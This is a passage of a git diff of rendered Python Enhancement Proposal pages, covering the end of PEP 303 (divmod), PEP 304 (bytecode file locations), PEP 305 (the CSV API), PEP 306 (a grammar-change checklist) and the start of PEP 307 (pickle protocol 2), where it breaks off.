(think of the chained divmod as a way of splitting a number into
“digits”, with varying weights), and it is reasonable to specify
the divisors (weights) in the same order as the result.

The inverse operation:

def inverse_divmod(seq, *factors):
    product = seq[0]
    for x, y in zip(factors, seq[1:]):
        product = product * x + y
    return product

could also be useful. However, writing

seconds = (((((w * 7) + d) * 24 + h) * 60 + m) * 60 + s)

is less cumbersome both to write and to read than the chained
divmods. It is therefore deemed to be less important, and its
introduction can be deferred to its own PEP. Also, such a
function needs a good name, and the PEP author has not managed to
come up with one yet.

Calling divmod("spam") does not raise an error, despite strings
supporting neither division nor modulo. However, unless we know
the other object too, we can’t determine whether divmod() would
work or not, and thus it seems silly to forbid it.

Backwards Compatibility

Any module that replaces the divmod() function in the __builtin__
module may cause other modules using the new syntax to break. It
is expected that this is very uncommon.

Code that expects a TypeError exception when calling divmod() with
anything but two arguments will break. This is also expected to
be very uncommon.

No other issues regarding backwards compatibility are known.


Reference Implementation

Not finished yet, but it seems a rather straightforward
new implementation of the function builtin_divmod() in
Python/bltinmodule.c.

References

Source: https://github.com/python/peps/blob/main/peps/pep-0303.rst

Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0304/index.html b/pep-0304/index.html
PEP 304 – Controlling Generation of Bytecode Files

Author: Skip Montanaro
Status: Withdrawn
Type: Standards Track
Created: 22-Jan-2003
Post-History: 27-Jan-2003, 31-Jan-2003, 17-Jun-2005

Historical Note

While this original PEP was withdrawn, a variant of this feature
was eventually implemented for Python 3.8 in https://bugs.python.org/issue33499

Several of the issues and concerns originally raised in this PEP were resolved
by other changes in the intervening years:

  • the introduction of isolated mode to handle potential security concerns
  • the switch to importlib, a fully import-hook based import system
    implementation
  • PEP 3147’s change in the bytecode cache layout to use __pycache__
    subdirectories, including the source_to_cache(path) and
    cache_to_source(path) APIs that allow the interpreter to automatically
    handle the redirection to a separate cache directory

Abstract

This PEP outlines a mechanism for controlling the generation and
location of compiled Python bytecode files. This idea originally
arose as a patch request [1] and evolved into a discussion thread on
the python-dev mailing list [2]. The introduction of an environment
variable will allow people installing Python or Python-based
third-party packages to control whether or not bytecode files should
be generated at installation time, and if so, where they should be
written. It will also allow users to control whether or not bytecode
files should be generated at application run-time, and if so, where
they should be written.

Proposal

Add a new environment variable, PYTHONBYTECODEBASE, to the mix of
environment variables which Python understands. PYTHONBYTECODEBASE is
interpreted as follows:

  • If not defined, Python bytecode is generated in exactly the same way
    as is currently done. sys.bytecodebase is set to the root directory
    (either / on Unix and Mac OSX or the root directory of the startup
    (installation???) drive – typically C:\ – on Windows).

  • If defined and it refers to an existing directory to which the user
    has write permission, sys.bytecodebase is set to that directory and
    bytecode files are written into a directory structure rooted at that
    location.

  • If defined but empty, sys.bytecodebase is set to None and generation
    of bytecode files is suppressed altogether.

  • If defined and one of the following is true:

      • it does not refer to a directory,
      • it refers to a directory, but not one for which the user has write
        permission

    a warning is displayed, sys.bytecodebase is set to None and
    generation of bytecode files is suppressed altogether.

After startup initialization, all runtime references are to
sys.bytecodebase, not the PYTHONBYTECODEBASE environment variable.
sys.path is not modified.

From the above, we see sys.bytecodebase can only take on two valid
types of values: None or a string referring to a valid directory on
the system.

During import, this extension works as follows:

  • The normal search for a module is conducted. The search order is
    roughly: dynamically loaded extension module, Python source file,
    Python bytecode file. The only time this mechanism comes into play
    is if a Python source file is found.

  • Once we’ve found a source module, an attempt to read a byte-compiled
    file in the same directory is made. (This is the same as before.)

  • If no byte-compiled file is found, an attempt to read a
    byte-compiled file from the augmented directory is made.

  • If bytecode generation is required, the generated bytecode is written
    to the augmented directory if possible.

Note that this PEP is explicitly not about providing
module-by-module or directory-by-directory control over the
disposition of bytecode files.

Glossary

  • “bytecode base” refers to the current setting of
    sys.bytecodebase.

  • “augmented directory” refers to the directory formed from the
    bytecode base and the directory name of the source file.

  • PYTHONBYTECODEBASE refers to the environment variable when necessary
    to distinguish it from “bytecode base”.

Locating bytecode files

When the interpreter is searching for a module, it will use sys.path
as usual. However, when a possible bytecode file is considered, an
extra probe for a bytecode file may be made. First, a check is made
for the bytecode file using the directory in sys.path which holds the
source file (the current behavior). If a valid bytecode file is not
found there (either one does not exist or exists but is out-of-date)
and the bytecode base is not None, a second probe is made using the
directory in sys.path prefixed appropriately by the bytecode base.

Writing bytecode files

When the bytecode base is not None, a new bytecode file is written to
the appropriate augmented directory, never directly to a directory in
sys.path.

Defining augmented directories

Conceptually, the augmented directory for a bytecode file is the
directory in which the source file exists prefixed by the bytecode
base. In a Unix environment this would be:

pcb = os.path.abspath(sys.bytecodebase)
if sourcefile[0] == os.sep: sourcefile = sourcefile[1:]
augdir = os.path.join(pcb, os.path.dirname(sourcefile))

On Windows, which does not have a single-rooted directory tree, the
drive letter of the directory containing the source file is treated as
a directory component after removing the trailing colon. The
augmented directory is thus derived as:

pcb = os.path.abspath(sys.bytecodebase)
drive, base = os.path.splitdrive(os.path.dirname(sourcefile))
drive = drive[:-1]
if base[0] == "\\": base = base[1:]
augdir = os.path.join(pcb, drive, base)
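A worked instance of the Unix recipe, using an assumed bytecode base of
/tmp and the urllib location from the Examples section below:

import os

bytecodebase = "/tmp"                       # stand-in for sys.bytecodebase
sourcefile = "/usr/lib/python2.3/urllib.py"

pcb = os.path.abspath(bytecodebase)
if sourcefile[0] == os.sep:
    sourcefile = sourcefile[1:]
augdir = os.path.join(pcb, os.path.dirname(sourcefile))
print(augdir)  # -> /tmp/usr/lib/python2.3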

Fixing the location of the bytecode base

During program startup, the value of the PYTHONBYTECODEBASE
environment variable is made absolute, checked for validity and added
to the sys module, effectively:

pcb = os.path.abspath(os.environ["PYTHONBYTECODEBASE"])
probe = os.path.join(pcb, "foo")
try:
    open(probe, "w")
except IOError:
    sys.bytecodebase = None
else:
    os.unlink(probe)
    sys.bytecodebase = pcb

This allows the user to specify the bytecode base as a relative path,
but not have it subject to changes to the current working directory
during program execution. (I can’t imagine you’d want it to move
around during program execution.)

There is nothing special about sys.bytecodebase. The user may change
it at runtime if desired, but normally it will not be modified.

Rationale

In many environments it is not possible for non-root users to write
into directories containing Python source files. Most of the time,
this is not a problem as Python source is generally byte compiled
during installation. However, there are situations where bytecode
files are either missing or need to be updated. If the directory
containing the source file is not writable by the current user a
performance penalty is incurred each time a program importing the
module is run. [3] Warning messages may also be generated in certain
circumstances. If the directory is writable, nearly simultaneous
attempts to write the bytecode file by two separate processes
may occur, resulting in file corruption. [4]

In environments with RAM disks available, it may be desirable for
performance reasons to write bytecode files to a directory on such a
disk. Similarly, in environments where Python source code resides on
network file systems, it may be desirable to cache bytecode files on
local disks.

Alternatives

The only other alternative proposed so far [1] seems to be to add a
-R flag to the interpreter to disable writing bytecode files
altogether. This proposal subsumes that. Adding a command-line
option is certainly possible, but is probably not sufficient, as the
interpreter’s command line is not readily available during
installation (early during program startup???).

Issues

  • Interpretation of a module’s __file__ attribute. I believe the
    __file__ attribute of a module should reflect the true location of
    the bytecode file. If people want to locate a module’s source code,
    they should use imp.find_module(module).

  • Security - What if root has PYTHONBYTECODEBASE set? Yes, this can
    present a security risk, but so can many other things the root user
    does. The root user should probably not set PYTHONBYTECODEBASE
    except possibly during installation. Still, perhaps this problem
    can be minimized. When running as root the interpreter should check
    to see if PYTHONBYTECODEBASE refers to a directory which is writable
    by anyone other than root. If so, it could raise an exception or
    warning and set sys.bytecodebase to None. Or, see the next item.

  • More security - What if PYTHONBYTECODEBASE refers to a general
    directory (say, /tmp)? In this case, perhaps loading of a
    preexisting bytecode file should occur only if the file is owned by
    the current user or root. (Does this matter on Windows?)

  • The interaction of this PEP with import hooks has not been
    considered yet. In fact, the best way to implement this idea might
    be as an import hook. See PEP 302.

  • In the current (pre-PEP 304) environment, it is safe to delete a
    source file after the corresponding bytecode file has been created,
    since they reside in the same directory. With PEP 304 as currently
    defined, this is not the case. A bytecode file in the augmented
    directory is only considered when the source file is present and is
    thus never considered when looking for module files ending in
    “.pyc”. I think this behavior may have to change.

Examples

In the examples which follow, the urllib source code resides in
/usr/lib/python2.3/urllib.py and /usr/lib/python2.3 is in sys.path but
is not writable by the current user.

  • The bytecode base is /tmp. /usr/lib/python2.3/urllib.pyc exists and
    is valid. When urllib is imported, the contents of
    /usr/lib/python2.3/urllib.pyc are used. The augmented directory is
    not consulted. No other bytecode file is generated.

  • The bytecode base is /tmp. /usr/lib/python2.3/urllib.pyc exists,
    but is out-of-date. When urllib is imported, the generated bytecode
    file is written to urllib.pyc in the augmented directory which has
    the value /tmp/usr/lib/python2.3. Intermediate directories will be
    created as needed.

  • The bytecode base is None. No urllib.pyc file is found. When
    urllib is imported, no bytecode file is written.

  • The bytecode base is /tmp. No urllib.pyc file is found. When
    urllib is imported, the generated bytecode file is written to the
    augmented directory which has the value /tmp/usr/lib/python2.3.
    Intermediate directories will be created as needed.

  • At startup, PYTHONBYTECODEBASE is /tmp/foobar, which does not exist.
    A warning is emitted, sys.bytecodebase is set to None and no
    bytecode files are written during program execution unless
    sys.bytecodebase is later changed to refer to a valid,
    writable directory.

  • At startup, PYTHONBYTECODEBASE is set to /, which exists, but is not
    writable by the current user. A warning is emitted,
    sys.bytecodebase is set to None and no bytecode files are
    written during program execution unless sys.bytecodebase is
    later changed to refer to a valid, writable directory. Note that
    even though the augmented directory constructed for a particular
    bytecode file may be writable by the current user, what counts is
    that the bytecode base directory itself is writable.

  • At startup PYTHONBYTECODEBASE is set to the empty string.
    sys.bytecodebase is set to None. No warning is generated, however.
    If no urllib.pyc file is found when urllib is imported, no bytecode
    file is written.

In the Windows examples which follow, the urllib source code resides
in C:\PYTHON22\urllib.py. C:\PYTHON22 is in sys.path but is
not writable by the current user.

  • The bytecode base is set to C:\TEMP. C:\PYTHON22\urllib.pyc
    exists and is valid. When urllib is imported, the contents of
    C:\PYTHON22\urllib.pyc are used. The augmented directory is not
    consulted.

  • The bytecode base is set to C:\TEMP. C:\PYTHON22\urllib.pyc
    exists, but is out-of-date. When urllib is imported, a new bytecode
    file is written to the augmented directory which has the value
    C:\TEMP\C\PYTHON22. Intermediate directories will be created as
    needed.

  • At startup PYTHONBYTECODEBASE is set to TEMP and the current
    working directory at application startup is H:\NET. The
    potential bytecode base is thus H:\NET\TEMP. If this directory
    exists and is writable by the current user, sys.bytecodebase will be
    set to that value. If not, a warning will be emitted and
    sys.bytecodebase will be set to None.

  • The bytecode base is C:\TEMP. No urllib.pyc file is found.
    When urllib is imported, the generated bytecode file is written to
    the augmented directory which has the value C:\TEMP\C\PYTHON22.
    Intermediate directories will be created as needed.

Implementation

See the patch on Sourceforge. [6]

References

Source: https://github.com/python/peps/blob/main/peps/pep-0304.rst

Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0305/index.html b/pep-0305/index.html
PEP 305 – CSV File API

Author: Kevin Altis <altis at semi-retired.com>,
Dave Cole <djc at object-craft.com.au>,
Andrew McNamara <andrewm at object-craft.com.au>,
Skip Montanaro <skip at pobox.com>,
Cliff Wells <LogiplexSoftware at earthlink.net>
Discussions-To: Csv list
Status: Final
Type: Standards Track
Created: 26-Jan-2003
Python-Version: 2.3
Post-History: 31-Jan-2003, 13-Feb-2003

Abstract

The Comma Separated Values (CSV) file format is the most common import
and export format for spreadsheets and databases. Although many CSV
files are simple to parse, the format is not formally defined by a
stable specification and is subtle enough that parsing lines of a CSV
file with something like line.split(",") is eventually bound to
fail. This PEP defines an API for reading and writing CSV files. It
is accompanied by a corresponding module which implements the API.

To Do (Notes for the Interested and Ambitious)


Application Domain

This PEP is about doing one thing well: parsing tabular data which may
use a variety of field separators, quoting characters, quote escape
mechanisms and line endings. The authors intend the proposed module
to solve this one parsing problem efficiently. The authors do not
intend to address any of these related topics:

  • data interpretation (is a field containing the string “10” supposed
    to be a string, a float or an int? is it a number in base 10, base
    16 or base 2? is a number in quotes a number or a string?)

  • locale-specific data representation (should the number 1.23 be
    written as “1.23” or “1,23” or “1 23”?) – this may eventually be
    addressed.

  • fixed width tabular data - can already be parsed reliably.

Rationale

Often, CSV files are formatted simply enough that you can get by
reading them line-by-line and splitting on the commas which delimit
the fields. This is especially true if all the data being read is
numeric. This approach may work for a while, then come back to bite
you in the butt when somebody puts something unexpected in the data
like a comma. As you dig into the problem you may eventually come to
the conclusion that you can solve the problem using regular
expressions. This will work for a while, then break mysteriously one
day. The problem grows, so you dig deeper and eventually realize that
you need a purpose-built parser for the format.

CSV formats are not well-defined and different implementations have a
number of subtle corner cases. It has been suggested that the “V” in
the acronym stands for “Vague” instead of “Values”. Different
delimiters and quoting characters are just the start. Some programs
generate whitespace after each delimiter which is not part of the
following field. Others quote embedded quoting characters by doubling
them, others by prefixing them with an escape character. The list of
weird ways to do things can seem endless.

All this variability means it is difficult for programmers to reliably
parse CSV files from many sources or generate CSV files designed to be
fed to specific external programs without a thorough understanding of
those sources and programs. This PEP and the software which accompany
it attempt to make the process less fragile.

Existing Modules

This problem has been tackled before. At least three modules
currently available in the Python community enable programmers to read
and write CSV files:

  • Object Craft’s CSV module [2]
  • Cliff Wells’ Python-DSV module [3]
  • Laurence Tratt’s ASV module [4]

Each has a different API, making it somewhat difficult for programmers
to switch between them. More of a problem may be that they interpret
some of the CSV corner cases differently, so even after surmounting
the differences between the different module APIs, the programmer has
to also deal with semantic differences between the packages.

Module Interface

This PEP supports three basic APIs, one to read and parse CSV files,
one to write them, and one to identify different CSV dialects to the
readers and writers.

Reading CSV Files

CSV readers are created with the reader factory function:

obj = reader(iterable [, dialect='excel']
             [optional keyword args])

A reader object is an iterator which takes an iterable object
returning lines as the sole required parameter. If it supports a
binary mode (file objects do), the iterable argument to the reader
function must have been opened in binary mode. This gives the reader
object full control over the interpretation of the file’s contents.
The optional dialect parameter is discussed below. The reader
function also accepts several optional keyword arguments which define
specific format settings for the parser (see the section “Formatting
Parameters”). Readers are typically used as follows:

csvreader = csv.reader(file("some.csv"))
for row in csvreader:
    process(row)

Each row returned by a reader object is a list of strings or Unicode
objects.

When both a dialect parameter and individual formatting parameters are
passed to the constructor, first the dialect is queried for formatting
parameters, then individual formatting parameters are examined.

Writing CSV Files

Creating writers is similar:

obj = writer(fileobj [, dialect='excel'],
             [optional keyword args])

A writer object is a wrapper around a file-like object opened for
writing in binary mode (if such a distinction is made). It accepts
the same optional keyword parameters as the reader constructor.

Writers are typically used as follows:

csvwriter = csv.writer(file("some.csv", "w"))
for row in someiterable:
    csvwriter.writerow(row)

To generate a set of field names as the first row of the CSV file, the
programmer must explicitly write it, e.g.:

csvwriter = csv.writer(file("some.csv", "w"), fieldnames=names)
csvwriter.write(names)
for row in someiterable:
    csvwriter.write(row)

or arrange for it to be the first row in the iterable being written.

Managing Different Dialects

Because CSV is a somewhat ill-defined format, there are plenty of ways
one CSV file can differ from another, yet contain exactly the same
data. Many tools which can import or export tabular data allow the
user to indicate the field delimiter, quote character, line
terminator, and other characteristics of the file. These can be
fairly easily determined, but are still mildly annoying to figure out,
and make for fairly long function calls when specified individually.

To try and minimize the difficulty of figuring out and specifying a
bunch of formatting parameters, reader and writer objects support a
dialect argument which is just a convenient handle on a group of these
lower level parameters. When a dialect is given as a string it
identifies one of the dialects known to the module via its
registration functions, otherwise it must be an instance of the
Dialect class as described below.

Dialects will generally be named after applications or organizations
which define specific sets of format constraints. Two dialects are
defined in the module as of this writing, “excel”, which describes the
default format constraints for CSV file export by Excel 97 and Excel
2000, and “excel-tab”, which is the same as “excel” but specifies an
ASCII TAB character as the field delimiter.

Dialects are implemented as attribute only classes to enable users to
construct variant dialects by subclassing. The “excel” dialect is a
subclass of Dialect and is defined as follows:

class Dialect:
    # placeholders
    delimiter = None
    quotechar = None
    escapechar = None
    doublequote = None
    skipinitialspace = None
    lineterminator = None
    quoting = None

class excel(Dialect):
    delimiter = ','
    quotechar = '"'
    doublequote = True
    skipinitialspace = False
    lineterminator = '\r\n'
    quoting = QUOTE_MINIMAL

The “excel-tab” dialect is defined as:

class exceltsv(excel):
    delimiter = '\t'

(For a description of the individual formatting parameters see the
section “Formatting Parameters”.)

To enable string references to specific dialects, the module defines
several functions:

dialect = get_dialect(name)
names = list_dialects()
register_dialect(name, dialect)
unregister_dialect(name)

get_dialect() returns the dialect instance associated with the
given name. list_dialects() returns a list of all registered
dialect names. register_dialect() associates a string name with
a dialect class. unregister_dialect() deletes a name/dialect
association.
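As an illustration of the registration functions, here is a hypothetical
“unix-pipe” dialect; the snippet assumes the module is importable as csv
and that the excel dialect class is exposed, as in the sample
implementation:

import csv

class pipes(csv.excel):        # reuse the "excel" defaults...
    delimiter = '|'            # ...but separate fields with a pipe

csv.register_dialect("unix-pipe", pipes)
print(csv.list_dialects())     # now includes "unix-pipe"

reader = csv.reader(open("some.txt"), dialect="unix-pipe")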

Formatting Parameters

In addition to the dialect argument, both the reader and writer
constructors take several specific formatting parameters, specified as
keyword parameters. The formatting parameters understood are:

  • quotechar specifies a one-character string to use as the quoting
    character. It defaults to '"'. Setting this to None has the same
    effect as setting quoting to csv.QUOTE_NONE.

  • delimiter specifies a one-character string to use as the field
    separator. It defaults to ','.

  • escapechar specifies a one-character string used to escape the
    delimiter when quotechar is set to None.

  • skipinitialspace specifies how to interpret whitespace which
    immediately follows a delimiter. It defaults to False, which means
    that whitespace immediately following a delimiter is part of the
    following field.

  • lineterminator specifies the character sequence which should
    terminate rows.

  • quoting controls when quotes should be generated by the writer.
    It can take on any of the following module constants:

      • csv.QUOTE_MINIMAL means only when required, for example, when a
        field contains either the quotechar or the delimiter
      • csv.QUOTE_ALL means that quotes are always placed around fields.
      • csv.QUOTE_NONNUMERIC means that quotes are always placed around
        nonnumeric fields.
      • csv.QUOTE_NONE means that quotes are never placed around fields.

  • doublequote controls the handling of quotes inside fields. When
    True two consecutive quotes are interpreted as one during read, and
    when writing, each quote is written as two quotes.

When processing a dialect setting and one or more of the other
optional parameters, the dialect parameter is processed before the
individual formatting parameters. This makes it easy to choose a
dialect, then override one or more of the settings without defining a
new dialect class. For example, if a CSV file was generated by Excel
2000 using single quotes as the quote character and a colon as the
delimiter, you could create a reader like:

csvreader = csv.reader(file("some.csv"), dialect="excel",
                       quotechar="'", delimiter=':')

Other details of how Excel generates CSV files would be handled
automatically because of the reference to the “excel” dialect.

Reader Objects

Reader objects are iterables whose next() method returns a sequence of
strings, one string per field in the row.

Writer Objects

Writer objects have two methods, writerow() and writerows(). The
former accepts an iterable (typically a list) of fields which are to
be written to the output. The latter accepts a list of iterables and
calls writerow() for each.
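A brief illustration of the two methods, written against today’s csv
module for concreteness (hence the newline='' convention rather than the
binary mode described above):

import csv

rows = [["name", "dob"], ["Anne", "1970-01-01"], ["Bob", "1971-02-03"]]
with open("people.csv", "w", newline="") as f:
    w = csv.writer(f)
    w.writerow(rows[0])    # one row at a time...
    w.writerows(rows[1:])  # ...or many rows in a single call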

Implementation

There is a sample implementation available. [1] The goal is for it
to efficiently implement the API described in the PEP. It is heavily
based on the Object Craft csv module. [2]

Testing

The sample implementation [1] includes a set of test cases.

Issues

  1. Should a parameter control how consecutive delimiters are
     interpreted? Our thought is “no”. Consecutive delimiters should
     always denote an empty field.

  2. What about Unicode? Is it sufficient to pass a file object gotten
     from codecs.open()? For example:

     csvreader = csv.reader(codecs.open("some.csv", "r", "cp1252"))
     csvwriter = csv.writer(codecs.open("some.csv", "w", "utf-8"))

     In the first example, text would be assumed to be encoded as cp1252.
     Should the system be aggressive in converting to Unicode or should
     Unicode strings only be returned if necessary?

     In the second example, the file will take care of automatically
     encoding Unicode strings as utf-8 before writing to disk.

     Note: As of this writing, the csv module doesn’t handle Unicode
     data.

  3. What about alternate escape conventions? If the dialect in use
     includes an escapechar parameter which is not None and the
     quoting parameter is set to QUOTE_NONE, delimiters appearing
     within fields will be prefixed by the escape character when writing
     and are expected to be prefixed by the escape character when
     reading.

  4. Should there be a “fully quoted” mode for writing? What about
     “fully quoted except for numeric values”? Both are implemented
     (QUOTE_ALL and QUOTE_NONNUMERIC, respectively).

  5. What about end-of-line? If I generate a CSV file on a Unix system,
     will Excel properly recognize the LF-only line terminators? Files
     must be opened for reading or writing as appropriate using binary
     mode. Specify the lineterminator sequence as '\r\n'. The
     resulting file will be written correctly.

  6. What about an option to generate dicts from the reader and accept
     dicts by the writer? See the DictReader and DictWriter classes in
     csv.py (illustrated in the sketch after this list).

  7. Are quote character and delimiters limited to single characters?
     For the time being, yes.

  8. How should rows of different lengths be handled? Interpretation of
     the data is the application’s job. There is no such thing as a
     “short row” or a “long row” at this level.
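The dict-based interface mentioned in item 6 looks like this in today’s csv
module (shown here for concreteness; the PEP itself only points at csv.py):

import csv

with open("people.csv", "w", newline="") as f:
    w = csv.DictWriter(f, fieldnames=["name", "dob"])
    w.writeheader()
    w.writerow({"name": "Anne", "dob": "1970-01-01"})

with open("people.csv", newline="") as f:
    for record in csv.DictReader(f):
        print(record["name"], record["dob"])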

References

There are many references to other CSV-related projects on the Web. A
few are included here.

Source: https://github.com/python/peps/blob/main/peps/pep-0305.rst


Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0306/index.html b/pep-0306/index.html
PEP 306 – How to Change Python’s Grammar

Author: Michael Hudson <mwh at python.net>, Jack Diederich <jackdied at gmail.com>, Alyssa Coghlan <ncoghlan at gmail.com>, Benjamin Peterson <benjamin at python.org>
Status: Withdrawn
Type: Informational
Created: 29-Jan-2003
Post-History: 30-Jan-2003

Note

This PEP has been moved to the Python dev guide [1].

Abstract

There’s more to changing Python’s grammar than editing
Grammar/Grammar and Python/compile.c. This PEP aims to be a
checklist of places that must also be fixed.

It is probably incomplete. If you see omissions, just add them if
you can – you are not going to offend the author’s sense of
ownership. Otherwise submit a bug or patch and assign it to mwh.

This PEP is not intended to be an instruction manual on Python
grammar hacking, for several reasons.

Rationale

People are getting this wrong all the time; it took well over a
year before someone noticed [2] that adding the floor division
operator (//) broke the parser module.

Checklist

+
    +
  • Grammar/Grammar: OK, you’d probably worked this one out :)
  • +
  • Parser/Python.asdl may need changes to match the Grammar. Run +make to regenerate Include/Python-ast.h and +Python/Python-ast.c.
  • +
  • Python/ast.c will need changes to create the AST objects +involved with the Grammar change. Lib/compiler/ast.py will +need matching changes to the pure-python AST objects.
  • +
  • Parser/pgen needs to be rerun to regenerate Include/graminit.h +and Python/graminit.c. (make should handle this for you.)
  • +
  • Python/symbtable.c: This handles the symbol collection pass +that happens immediately before the compilation pass.
  • +
  • Python/compile.c: You will need to create or modify the +compiler_* functions to generate opcodes for your productions.
  • +
  • You may need to regenerate Lib/symbol.py and/or Lib/token.py +and/or Lib/keyword.py.
  • +
  • The parser module. Add some of your new syntax to test_parser, +bang on Modules/parsermodule.c until it passes.
  • +
  • Add some usage of your new syntax to test_grammar.py.
  • +
  • The compiler package. A good test is to compile the standard +library and test suite with the compiler package and then check +it runs. Note that this only needs to be done in Python 2.x.
  • +
  • If you’ve gone so far as to change the token structure of Python, then the Lib/tokenize.py library module will need to be changed.
  • +
  • Certain changes may require tweaks to the library module +pyclbr.
  • +
  • Documentation must be written!
  • +
  • After everything’s been checked in, you’re likely to see a new +change to Python/Python-ast.c. This is because this +(generated) file contains the SVN version of the source from +which it was generated. There’s no way to avoid this; you just +have to submit this file separately.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0306.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0307/index.html b/pep-0307/index.html
new file mode 100644
index 00000000000..b5d394f170a
--- /dev/null
+++ b/pep-0307/index.html
@@ -0,0 +1,904 @@

PEP 307 – Extensions to the pickle protocol | peps.python.org
+
+


+ + +
+
+
+

PEP 307 – Extensions to the pickle protocol

+
+
Author:
+
Guido van Rossum, Tim Peters
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
31-Jan-2003
+
Python-Version:
+
2.3
+
Post-History:
+
07-Feb-2003
+
+
+
+
Table of Contents +
+
+

Introduction

+

Pickling new-style objects in Python 2.2 is done somewhat clumsily +and causes pickle size to bloat compared to classic class +instances. This PEP documents a new pickle protocol in Python 2.3 +that takes care of this and many other pickle issues.

+

There are two sides to specifying a new pickle protocol: the byte +stream constituting pickled data must be specified, and the +interface between objects and the pickling and unpickling engines +must be specified. This PEP focuses on API issues, although it +may occasionally touch on byte stream format details to motivate a +choice. The pickle byte stream format is documented formally by +the standard library module pickletools.py (already checked into +CVS for Python 2.3).

+

This PEP attempts to fully document the interface between pickled +objects and the pickling process, highlighting additions by +specifying “new in this PEP”. (The interface to invoke pickling +or unpickling is not covered fully, except for the changes to the +API for specifying the pickling protocol to picklers.)

+
+
+

Motivation

+

Pickling new-style objects causes serious pickle bloat. For +example:

+
import pickle

class C(object):   # omit "(object)" for a classic class
    pass
x = C()
x.foo = 42
print len(pickle.dumps(x, 1))
+
+
+

The binary pickle for the classic object consumed 33 bytes, and for +the new-style object 86 bytes.

+

The reasons for the bloat are complex, but are mostly caused by +the fact that new-style objects use __reduce__ in order to be +picklable at all. After ample consideration we’ve concluded that +the only way to reduce pickle sizes for new-style objects is to +add new opcodes to the pickle protocol. The net result is that +with the new protocol, the pickle size in the above example is 35 +(two extra bytes are used at the start to indicate the protocol +version, although this isn’t strictly necessary).

+
+
+

Protocol versions

+

Previously, pickling (but not unpickling) distinguished between +text mode and binary mode. By design, binary mode is a +superset of text mode, and unpicklers don’t need to know in +advance whether an incoming pickle uses text mode or binary mode. +The virtual machine used for unpickling is the same regardless of +the mode; certain opcodes simply aren’t used in text mode.

+

Retroactively, text mode is now called protocol 0, and binary mode +protocol 1. The new protocol is called protocol 2. In the +tradition of pickling protocols, protocol 2 is a superset of +protocol 1. But just so that future pickling protocols aren’t +required to be supersets of the oldest protocols, a new opcode is +inserted at the start of a protocol 2 pickle indicating that it is +using protocol 2. To date, each release of Python has been able to +read pickles written by all previous releases. Of course pickles +written under protocol N can’t be read by versions of Python +earlier than the one that introduced protocol N.

+

Several functions, methods and constructors used for pickling used +to take a positional argument named ‘bin’ which was a flag, +defaulting to 0, indicating binary mode. This argument is renamed +to ‘protocol’ and now gives the protocol number, still defaulting +to 0.

+

It so happens that passing 2 for the ‘bin’ argument in previous +Python versions had the same effect as passing 1. Nevertheless, a +special case is added here: passing a negative number selects the +highest protocol version supported by a particular implementation. +This works in previous Python versions, too, and so can be used to +select the highest protocol available in a way that’s both backward +and forward compatible. In addition, a new module constant +HIGHEST_PROTOCOL is supplied by both pickle and cPickle, equal to +the highest protocol number the module can read. This is cleaner +than passing -1, but cannot be used before Python 2.3.

+
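For example, under these rules (as of Python 2.3, where protocol 0 is still the default; HIGHEST_PROTOCOL is the new constant, while -1 works on older versions as well):

import pickle

data = {'spam': 1}
p0 = pickle.dumps(data)                           # protocol 0 (old text mode)
p1 = pickle.dumps(data, 1)                        # protocol 1 (old binary mode)
p2 = pickle.dumps(data, 2)                        # protocol 2 (new in 2.3)
pn = pickle.dumps(data, -1)                       # highest available, any version
ph = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)  # same, but 2.3 and later only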

The pickle.py module has supported passing the ‘bin’ value as a +keyword argument rather than a positional argument. (This is not +recommended, since cPickle only accepts positional arguments, but +it works…) Passing ‘bin’ as a keyword argument is deprecated, +and a PendingDeprecationWarning is issued in this case. You have +to invoke the Python interpreter with -Wa or a variation on that +to see PendingDeprecationWarning messages. In Python 2.4, the +warning class may be upgraded to DeprecationWarning.

+
+
+

Security issues

+

In previous versions of Python, unpickling would do a “safety +check” on certain operations, refusing to call functions or +constructors that weren’t marked as “safe for unpickling” by +either having an attribute __safe_for_unpickling__ set to 1, or by +being registered in a global registry, copy_reg.safe_constructors.

+

This feature gives a false sense of security: nobody has ever done +the necessary, extensive, code audit to prove that unpickling +untrusted pickles cannot invoke unwanted code, and in fact bugs in +the Python 2.2 pickle.py module make it easy to circumvent these +security measures.

+

We firmly believe that, on the Internet, it is better to know that +you are using an insecure protocol than to trust a protocol to be +secure whose implementation hasn’t been thoroughly checked. Even +high quality implementations of widely used protocols are +routinely found flawed; Python’s pickle implementation simply +cannot make such guarantees without a much larger time investment. +Therefore, as of Python 2.3, all safety checks on unpickling are +officially removed, and replaced with this warning:

+
+

Warning

+

Do not unpickle data received from an untrusted or +unauthenticated source.

+
+

The same warning applies to previous Python versions, despite the +presence of safety checks there.

+
+
+

Extended __reduce__ API

+

There are several APIs that a class can use to control pickling. +Perhaps the most popular of these are __getstate__ and +__setstate__; but the most powerful one is __reduce__. (There’s +also __getinitargs__, and we’re adding __getnewargs__ below.)

+

There are several ways to provide __reduce__ functionality: a +class can implement a __reduce__ method or a __reduce_ex__ method +(see next section), or a reduce function can be declared in +copy_reg (copy_reg.dispatch_table maps classes to functions). The +return values are interpreted exactly the same, though, and we’ll +refer to these collectively as __reduce__.

+

Important: pickling of classic class instances does not look for a +__reduce__ or __reduce_ex__ method or a reduce function in the +copy_reg dispatch table, so that a classic class cannot provide +__reduce__ functionality in the sense intended here. A classic +class must use __getinitargs__ and/or __getstate__ to customize +pickling. These are described below.

+

__reduce__ must return either a string or a tuple. If it returns +a string, this is an object whose state is not to be pickled, but +instead a reference to an equivalent object referenced by name. +Surprisingly, the string returned by __reduce__ should be the +object’s local name (relative to its module); the pickle module +searches the module namespace to determine the object’s module.

+

The rest of this section is concerned with the tuple returned by +__reduce__. It is a variable size tuple, of length 2 through 5. +The first two items (function and arguments) are required. The +remaining items are optional and may be left off from the end; +giving None for the value of an optional item acts the same as +leaving it off. The last two items are new in this PEP. The items +are, in order:

+ + + + + + + + + +
function (required)

A callable object (not necessarily a function) called +to create the initial version of the object; state +may be added to the object later to fully reconstruct +the pickled state. This function must itself be +picklable. See the section about __newobj__ for a +special case (new in this PEP) here.

+
arguments (required)

